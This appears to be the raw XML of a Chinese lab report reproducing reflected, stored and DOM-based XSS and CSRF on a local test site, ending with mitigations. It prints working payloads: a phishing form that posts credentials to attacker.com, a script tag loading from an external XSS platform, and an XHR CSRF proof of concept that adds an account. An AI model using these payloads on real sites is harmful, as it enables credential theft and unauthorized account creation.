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96C9E7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/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XSS漏洞与CSRF漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA83B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F87BCA">
      <w:pPr>
        <w:pStyle w:val="2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反射性xss漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EC7C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1.1.1 漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A782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页面地结构很简单,就是一个实现了输出输入地字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354966EB">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="16243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C4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显然可能存在xss漏洞,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F8BD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直接使用payload弹框测试发现没有反馈,查看网页源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF37F76">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="33064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B69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发现输入数据是存储到value中,同时网页没有对输入输出进行过滤:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D63B8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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">通过构造payload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&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(/xss/)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功弹窗测试其他方式发现也存在弹窗</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3268980"/>
            <wp:effectExtent l="0" t="0" r="1143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847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证明xss漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60494A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还有一些其他方法验证漏洞存在:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70467AD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1114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8CA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漏洞成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D3C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通过构造特殊地payload ,闭合了页面标签,导致原本的数据部分经过浏览器渲染成了可执行的代码,出现了弹框标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E25EA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源代码如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729670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80022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FE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可以看到输出数据时名没有对代码进行任何地过滤直接输出input 拼接{xss_input_value}的标签,可以是任意代码输出到页面中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ED68E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漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AFFAC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反射性xss通过构造特殊url,当访问不安全的url是会遭受到攻击:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450BD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当我构造好了用其他浏览器访问网址时出现弹框:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26844D4C">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1250315"/>
            <wp:effectExtent l="0" t="0" r="19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2B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同时利用xss平台等可以获取相应数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCC17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338830"/>
            <wp:effectExtent l="0" t="0" r="508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9B6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1.窃取cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0700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2.未授权操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C298E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3.传播蠕虫病毒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4170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表单钓鱼payload:&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F4EFF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document.body.innerHTML = '&lt;form action="http://attacker.com/phish"&gt;&lt;input name="user"&gt;&lt;input name="pass" type="password"&gt;&lt;input type="submit"&gt;&lt;/form&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568C3E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 w14:paraId="3A05603A">
      <w:pPr>
        <w:pStyle w:val="2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存储型xss漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F95A8E"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 w14:paraId="7DF58AC3"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3420110"/>
            <wp:effectExtent l="0" t="0" r="444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CEB5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当访问网站时,因为留言板的数据存储到数据库中导致数据库污染,每次访问都会受到xss攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586875B8"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漏洞原因 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB270C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同样是在将数据存储到数据库中的时候没有任何过滤,直接将用户输入全部存储到数据库中,当内容从数据库查询出来显示到页面是,页面执行了脚本,产生弹框</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A79D4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代码如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A2978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89200"/>
            <wp:effectExtent l="0" t="0" r="127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6A80">
      <w:pPr>
        <w:pStyle w:val="2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DOM型xss漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176FF62"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漏洞复现:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B11501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这次网站的输入信息也是会输出到当前页面中:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D05B7"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259205"/>
            <wp:effectExtent l="0" t="0" r="1016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A713"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29225" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="317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ECD8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网页源代码可以看到&lt;h6 id=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id1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&gt;content&lt;/h6&gt;那么就可以很轻松的根据网页源代码构造payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A674D4B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发现script未能成功执行,使用其他标签:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6AD9F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24250" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="635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CBF4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&lt;img src=x onerror=alert(1)&gt;页面出现弹框</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A78D5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81605"/>
            <wp:effectExtent l="0" t="0" r="10160" b="107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0487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漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA3D5F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DOM 型 XSS 的触发不依赖服务器对输入的处理，而是由于前端 JavaScript 代码不安全地操作 DOM（如直接使用用户输入数据修改页面元素），导致攻击者注入的恶意脚本被浏览器执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C698D3"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75D85A54"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CSRF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE38E9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漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3573222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首先网页实现的功能是管理员登录后,管理员有个一添加用户的功能,输入添加用户的账号木马即可添加用户成功:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B626816">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="935990"/>
            <wp:effectExtent l="0" t="0" r="10160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1A5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通过brup拦截数据包,使用重放器修改数据包并重放发现能够实现用户添加</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002CD93">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259705" cy="3635375"/>
            <wp:effectExtent l="0" t="0" r="10795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1E7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存在scrf漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5750EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E6376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漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35B84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利用brup生成poc,生成特殊连接,如果用户处于登录状态并访问恶意连接就会自动添加用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B14BA"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CSRF+XSS漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9B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漏洞复现:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2221A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页面存在一个的管理员的登陆页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E7F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管理员登录以后可以查看留言板的内用,而用户可以在留言板留言:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35015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用户:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8543C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71090"/>
            <wp:effectExtent l="0" t="0" r="12065" b="38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ECF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管理员:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC719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953895"/>
            <wp:effectExtent l="0" t="0" r="2540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B0A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因为留言板存在恶意xss攻击代码,用户可以通过构造xss代码实现对管理员的csrf攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7D37E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通过brup生成异步poc,代码如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77BE2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function submitRequest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9A71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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99843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xhr = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E6EC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xhr.open("POST", "http:\/\/192.168.1.8\/4.6\/4.6.3\/adduser.php", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392735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xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2CD14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xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC313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xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DE2A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xhr.withCredentials = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCB4D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body = "username=zhangsan&amp;password=zhangsan&amp;addsubmit=";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20E53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aBody = new Uint8Array(body.length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06626E5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aBody.length; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F6EE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aBody[i] = body.charCodeAt(i); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F33D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xhr.send(new Blob([aBody]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8CC0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 w14:paraId="6E8DB4B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submitRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F61A77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6805E8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将此代码配置到XSS平台,执行脚本会执行该代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C3E0B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 sRC=//xs.pe/HBF&gt;&lt;/sCrIpT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B318CF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将此脚本代码通过留言板提交,管理员访问留言板就会产生xss攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DE42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并自动添加用户,实现csrf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCC0B3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3255645"/>
            <wp:effectExtent l="0" t="0" r="8255" b="825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AC6B"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可以看到,浏览器自动执行了脚本并且添加用户,数据库中也添加了该数据</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2578735"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1206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646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恶意用户hack添加完毕,复现完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56315BF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漏洞成因:访问留言板是,存储型xss漏洞代码会被浏览器执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32ADD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5133D0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7AD11F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 w14:paraId="5C49F53D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对于CSRF漏洞,验证referer值,只接受自己域名网站的请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A4ACD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生成随机token,使得攻击者不能够伪造用户的请求,其次token不可预测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153FE279">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7257FD28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对于xss漏洞,对输入和输出进行严格过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E54AB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过滤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&lt; &gt; on等危险字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77877CB5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对输出到页面的数据进行编码转换,包括,HTML实体编码,JS编码等,需要从输入和输出两方面进行过滤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B0CC10"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="94B0C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BC7B181"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBC7B18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7EE97634"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7EE976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11C32"/>
    <w:rsid w:val="09335033"/>
    <w:rsid w:val="19E715FA"/>
    <w:rsid w:val="1F612DBB"/>
    <w:rsid w:val="2DDF10A4"/>
    <w:rsid w:val="43BD07B0"/>
    <w:rsid w:val="45145E4B"/>
    <w:rsid w:val="592221C6"/>
    <w:rsid w:val="673E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样式1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:fill="F9FAF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380</Words>
  <Characters>671</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>230</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>689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2025-05-21T05:18:00Z</dcterms:created>
  <dc:creator>童春林</dc:creator>
  <cp:lastModifiedBy>aaa</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-06T07:02:30Z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C2F83F56F8E9455D84D9C878DE9D2E6D_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMTM3NDk0ZTIyZTk2MmJlNDc2YzE3M2M3MGVmNGZjMDIiLCJ1c2VySWQiOiI2ODY3MzgyNTMifQ==</vt:lpwstr>
  </property>
</Properties>
</file>